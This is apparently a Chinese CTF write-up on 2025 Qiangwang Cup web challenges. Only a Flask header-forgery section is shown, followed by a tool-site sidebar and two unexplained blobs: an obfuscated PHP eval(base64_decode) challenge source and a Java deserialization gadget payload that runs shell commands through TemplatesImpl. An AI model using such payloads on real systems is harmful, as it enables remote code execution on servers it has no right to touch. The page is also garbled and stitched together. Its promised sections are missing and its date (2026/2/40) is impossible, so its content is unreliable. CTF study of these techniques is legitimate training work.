2025 强网杯 Web 安全解题思路汇总

2025 强网杯 Web 安全挑战解题思路汇总，涵盖 Flask 请求头伪造绕过、Spring Boot SpEL 注入、Java 代码执行、PHP 反序列化与 Phar 上传、JBoss 反序列化提权以及 SSRF 结合 Redis Lua 脚本等常见 Web 漏洞利用技术。文章详细分析了各题目的源码逻辑、漏洞原理及 Payload 构造过程，提供了完整的攻防思路与代码示例。

赛博朋克发布于 2026/2/40 浏览

2025 强网杯 Web 安全解题思路汇总

secret_value

题目提供了一个 Flask 应用，登录后可在 dashboard 处获取 flag。访问 dashboard 前需经过 login_required 装饰器检查。

def login_required(view_func):
    @wraps(view_func)
    def wrapped(*args, **kwargs):
        uid = request.headers.get('X-User', '0')
        print(uid)
        if uid == 'anonymous':
            flash('Please sign in first.', 'warning')
            return redirect(url_for('login'))
        try:
            uid_int = int(uid)
        except (TypeError, ValueError):
            flash('Invalid session. Please sign in again.', 'warning')
            return redirect(url_for('login'))
        user = User.query.filter_by(id=uid_int).first()
        if not user:
            flash('User not found. Please sign in again.', 'warning')
            return redirect(url_for('login'))
        g.current_user = user
        return view_func(*args, **kwargs)
    return wrapped

1️⃣ 读取代理传来的用户 ID

Flask 每次请求时从 HTTP 请求头中取出 X-User。该头由前端的 Go Authorizer 代理自动添加：

未登录时：X-User: anonymous
已登录时：X-User: 1（用户 ID）

普通用户注册后无法查看内容，需要伪造管理员身份。虽然中间件的 Go 代码会自动识别并覆盖当前用户的 UID，但可以利用 Hop-by-Hop Headers 的特性删除 Go 生成的请求头，从而绕过强制校验。

相关免费在线工具

加密/解密文本

使用加密算法（如AES、TripleDES、Rabbit或RC4）加密和解密文本明文。在线工具，加密/解密文本在线工具，online

RSA密钥对生成器

生成新的随机RSA私钥和公钥pem证书。在线工具，RSA密钥对生成器在线工具，online

Keycode 信息

查找任何按下的键的javascript键代码、代码、位置和修饰符。在线工具，Keycode 信息在线工具，online

Escape 与 Native 编解码

JavaScript 字符串转义/反转义；Java 风格 \uXXXX（Native2Ascii）编码与解码。在线工具，Escape 与 Native 编解码在线工具，online

Mermaid 预览与可视化编辑

基于 Mermaid.js 实时预览流程图、时序图等图表，支持源码编辑与即时渲染。在线工具，Mermaid 预览与可视化编辑在线工具，online

JavaScript / HTML 格式化

使用 Prettier 在浏览器内格式化 JavaScript 或 HTML 片段。在线工具，JavaScript / HTML 格式化在线工具，online

<?=eval(base64_decode('ZnVuY3Rpb24gZ2VuZXJhdGVSYW5kb21TdHJpbmcoJGxlbmd0aCA9IDgpeyRjaGFyYWN0ZXJzID0gJ2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JzskcmFuZG9tU3RyaW5nID0gJyc7Zm9yICgkaSA9IDA7ICRpIDwgJGxlbmd0aDsgJGkrKykgeyRyID0gcmFuZCgwLCBzdHJsZW4oJGNoYXJhY3RlcnMpIC0gMSk7JHJhbmRvbVN0cmluZyAuPSAkY2hhcmFjdGVyc1skcl07fXJldHVybiAkcmFuZG9tU3RyaW5nO31kYXRlX2RlZmF1bHRfdGltZXpvbmVfc2V0KCdBc2lhL1NoYW5naGFpJyk7Y2xhc3MgdGVzdHtwdWJsaWMgJHJlYWRmbGFnO3B1YmxpYyAkZjtwdWJsaWMgJGtleTtwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoKXskdGhpcy0+cmVhZGZsYWcgPSBuZXcgY2xhc3Mge3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgpe2lmIChpc3NldCgkX0ZJTEVTWydmaWxlJ10pICYmICRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA9PSAwKSB7JHRpbWUgPSBkYXRlKCdIaScpOyRmaWxlbmFtZSA9ICRHTE9CQUxTWydmaWxlbmFtZSddOyRzZWVkID0gJHRpbWUgLiBpbnR2YWwoJGZpbGVuYW1lKTttdF9zcmFuZCgkc2VlZCk7JHVwbG9hZERpciA9ICd1cGxvYWRzLyc7JGZpbGVzID0gZ2xvYigkdXBsb2FkRGlyIC4gJyonKTtmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpIHtpZiAoaXNfZmlsZSgkZmlsZSkpIHVubGluaygkZmlsZSk7fSRyYW5kb21TdHIgPSBnZW5lcmF0ZVJhbmRvbVN0cmluZyg4KTskbmV3RmlsZW5hbWUgPSAkdGltZSAuICcuJyAuICRyYW5kb21TdHIgLiAnLicgLiAnanBnJzskR0xPQkFMU1snZmlsZSddID0gJG5ld0ZpbGVuYW1lOyR1cGxvYWRlZEZpbGUgPSAkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ107JHVwbG9hZFBhdGggPSAkdXBsb2FkRGlyIC4gJG5ld0ZpbGVuYW1lOyBpZiAoc3lzdGVtKCJjcCAiLiR1cGxvYWRlZEZpbGUuIiAiLiAkdXBsb2FkUGF0aCkpIHtlY2hvICJzdWNjZXNzIHVwbG9hZCEiO30gZWxzZSB7ZWNobyAiZXJyb3IiO319fXB1YmxpYyBmdW5jdGlvbiBfX3dha2V1cCgpe3BocGluZm8oKTt9cHVibGljIGZ1bmN0aW9uIHJlYWRmbGFnKCl7ZnVuY3Rpb24gcmVhZGZsYWcoKXtpZiAoaXNzZXQoJEdMT0JBTFNbJ2ZpbGUnXSkpIHskZmlsZSA9ICRHTE9CQUxTWydmaWxlJ107JGZpbGUgPSBiYXNlbmFtZSgkZmlsZSk7aWYgKHByZWdfbWF0Y2goJy86XC9cLy8nLCAkZmlsZSkpZGllKCJlcnJvciIpOyRmaWxlX2NvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygidXBsb2Fkcy8iIC4gJGZpbGUpO2lmIChwcmVnX21hdGNoKCcvPFw/fFw6XC9cL3xwaHxcP1w9L2knLCAkZmlsZV9jb250ZW50KSkge2RpZSgiSWxsZWdhbCBjb250ZW50IGRldGVjdGVkIGluIHRoZSBmaWxlLiIpO31pbmNsdWRlKCJ1cGxvYWRzLyIgLiAkZmlsZSk7fX19fTt9cHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXskZnVuYyA9ICR0aGlzLT5mOyRHTE9CQUxTWydmaWxlbmFtZSddID0gJHRoaXMtPnJlYWRmbGFnO2lmICgkdGhpcy0+a2V5ID09ICdjbGFzcycpbmV3ICRmdW5jKCk7ZWxzZSBpZiAoJHRoaXMtPmtleSA9PSAnZnVuYycpIHskZnVuYygpO30gZWxzZSB7aGlnaGxpZ2h0X2ZpbGUoJ2luZGV4LnBocCcpO319fSRzZXIgPSBpc3NldCgkX0dFVFsnbGFuZCddKSA/ICRfR0VUWydsYW5kJ10gOiAnTzo0OiJ0ZXN0IjpOJztAdW5zZXJpYWxpemUoJHNlcik7'));

String payload = "rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAaMGvwbLBp8CuwaHBsMGhwaPBqMGlwK7Bo8Gvwa3BrcGvwa7Bs8CuwaPBr8GswazBpcGjwbTBqcGvwa7Bs8CuwavBpcG5wbbBocGswbXBpcCuwZTBqcGlwaTBjcGhwbDBhcGuwbTBssG5iq3SmznBH9sCAAJMAAbBq8Glwbl0ACTBjMGqwaHBtsGhwK/BrMGhwa7Bp8CvwY/BosGqwaXBo8G0wLtMAAbBrcGhwbB0AB7BjMGqwaHBtsGhwK/BtcG0wanBrMCvwY3BocGwwLt4cHNyAHTBo8Gvwa3ArsGzwbXBrsCuwa/BssGnwK7BocGwwaHBo8GowaXArsG4waHBrMGhwa7ArsGpwa7BtMGlwbLBrsGhwazArsG4wbPBrMG0waPArsG0wbLBocG4wK7BlMGlwa3BsMGswaHBtMGlwbPBicGtwbDBrAlXT8FurKszAwAGSQAawZ/BqcGuwaTBpcGuwbTBjsG1wa3BosGlwbJJABzBn8G0wbLBocGuwbPBrMGlwbTBicGuwaTBpcG4WwAUwZ/BosG5wbTBpcGjwa/BpMGlwbN0AAbBm8GbwYJbAAzBn8GjwazBocGzwbN0ACTBm8GMwarBocG2waHAr8GswaHBrsGnwK/Bg8GswaHBs8GzwLtMAArBn8GuwaHBrcGldAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAiwZ/Br8G1wbTBsMG1wbTBkMGywa/BsMGlwbLBtMGpwaXBs3QALMGMwarBocG2waHAr8G1wbTBqcGswK/BkMGywa/BsMGlwbLBtMGpwaXBs8C7eHAAAAAA/////3VyAAbBm8GbwYJL/RkVZ2fbNwIAAHhwAAAAAnVyAATBm8GCrPMX+AYIVOACAAB4cAAADtbK/rq+AAAANABmCgAUADQIADUKAAUANggAHgcANwcAIQoABQA4CgA5ADoKADsAPAgAPQoAPgA/CgAFAEAKAEEAOgcAQgoAQwBECgBBAEUKADkARgoABQBHBwBIBwBJAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACFMcGF5bG9hZC9UZW1wbGF0ZUltcGxDbGFzc0xvYWRlcjsBAAZsb2FkZXIBABFMamF2YS9sYW5nL0NsYXNzOwEAC2RlZmluZUNsYXNzAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAARjb2RlAQACW0IBAAtjb25zdHJ1Y3RvcgEAH0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAApFeGNlcHRpb25zBwBKAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcASwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEAHFRlbXBsYXRlSW1wbENsYXNzTG9hZGVyLmphdmEMABUAFgEATmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwkVHJhbnNsZXRDbGFzc0xvYWRlcgwATABNAQAPamF2YS9sYW5nL0NsYXNzDABOAE8HAFAMAFEAUgcAUwwAVABXAQVceXY2NnZnQUFBRFFBUUFvQUVBQWxDQUFtQ1FBbkFDZ0lBQ2tLQUFZQUtnY0FLd2dBTEFnQUxRZ0FIUWdBTGdvQUx3QXdDZ0F2QURFSEFESUtBQTBBTXdjQU5BY0FOUUVBQmp4cGJtbDBQZ0VBQXlncFZnRUFCRU52WkdVQkFBOU1hVzVsVG5WdFltVnlWR0ZpYkdVQkFCSk1iMk5oYkZaaGNtbGhZbXhsVkdGaWJHVUJBQVIwYUdsekFRQVZUSEJoZVd4dllXUXZVblZ1ZEdsdFpVVjRaV003QVFBSVBHTnNhVzVwZEQ0QkFBUjJZWEl4QVFBVFcweHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFCSFpoY2pNQkFCVk1hbUYyWVM5cGJ5OUpUMFY0WTJWd2RHbHZianNCQUFOamJXUUJBQkpNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUExVGRHRmphMDFoY0ZSaFlteGxCd0FyQndBYUJ3QXlBUUFLVTI5MWNtTmxSbWxzWlFFQUVGSjFiblJwYldWRmVHVmpMbXBoZG1FTUFCRUFFZ0VBVkdOaGRDQXZaWFJqTDJsaVpHTnFaR0ZxYVdvdmFXSmtZMnBrWVdwcGFpOXBZbVJqYW1SaGFtbHFMMmxpWkdOcVpHRnFhV292YVdKa1kycGtZV3BwYWk5bWJEUTBORFEwTkdjZ1BpQXZkRzF3THpFeU13Y0FOZ3dBTndBZUFRQUJMd3dBT0FBNUFRQVFhbUYyWVM5c1lXNW5MMU4wY21sdVp3RUFCeTlpYVc0dmMyZ0JBQUl0WXdFQUFpOURCd0E2REFBN0FEd01BRDBBUGdFQUUycGhkbUV2YVc4dlNVOUZlR05sY0hScGIyNE1BRDhBRWdFQUNXVlJkVzV6U1ZCdU1RRUFFR3BoZG1FdmJHRnVaeTlQWW1wbFkzUUJBQXhxWVhaaEwybHZMMFpwYkdVQkFBbHpaWEJoY21GMGIzSUJBQVpsY1hWaGJITUJBQlVvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1ZvQkFCRnFZWFpoTDJ4aGJtY3ZVblZ1ZEdsdFpRRUFDbWRsZEZKMWJuUnBiV1VCQUJVb0tVeHFZWFpoTDJ4aGJtY3ZVblZ1ZEdsdFpUc0JBQVJsZUdWakFRQW9LRnRNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56T3dFQUQzQnlhVzUwVTNSaFkydFVjbUZqWlFBaEFBOEFFQUFBQUFBQUFnQUJBQkVBRWdBQkFCTUFBQUF2QUFFQUFRQUFBQVVxdHdBQnNRQUFBQUlBRkFBQUFBWUFBUUFBQUFVQUZRQUFBQXdBQVFBQUFBVUFGZ0FYQUFBQUNBQVlBQklBQVFBVEFBQUEwd0FFQUFNQUFBQklFZ0pMc2dBREVnUzJBQVdaQUJrR3ZRQUdXUU1TQjFOWkJCSUlVMWtGS2xOTXB3QVdCcjBBQmxrREVnbFRXUVFTQ2xOWkJTcFRUTGdBQ3l1MkFBeFhwd0FJVFN5MkFBNnhBQUVBTndBL0FFSUFEUUFEQUJRQUFBQW1BQWtBQUFBSEFBTUFDUUFPQUFvQUpBQU1BRGNBRHdBL0FCSUFRZ0FRQUVNQUVRQkhBQk1BRlFBQUFDb0FCQUFoQUFNQUdRQWFBQUVBUXdBRUFCc0FIQUFDQUFNQVJBQWRBQjRBQUFBM0FCQUFHUUFhQUFFQUh3QUFBQlVBQlB3QUpBY0FJUHdBRWdjQUlVb0hBQ0w1QUFRQUFRQWpBQUFBQWdBawcAWAwAWQBaDABbAFwHAF0BABBqYXZhL2xhbmcvT2JqZWN0BwBeDABfAGAGEAYgwAYwBkDABhAGUBAAVib3Z0TwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy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"; byte[] serialize = Base64.getDecoder().decode(payload); byte[] aced = Arrays.copyOfRange(serialize, 0, 4); byte[] range = Arrays.copyOfRange(serialize, 4, serialize.length); byte[] bs = new byte[]{0x77, 0x01, 0x16, 0x79}; System.out.println(aced.length + range.length == serialize.length); byte[] bytes = ArrayUtils.addAll(aced, bs); bytes = ArrayUtils.addAll(bytes, range); Files.write(bytes, new File("./payload.ser"));

2025 强网杯 Web 安全解题思路汇总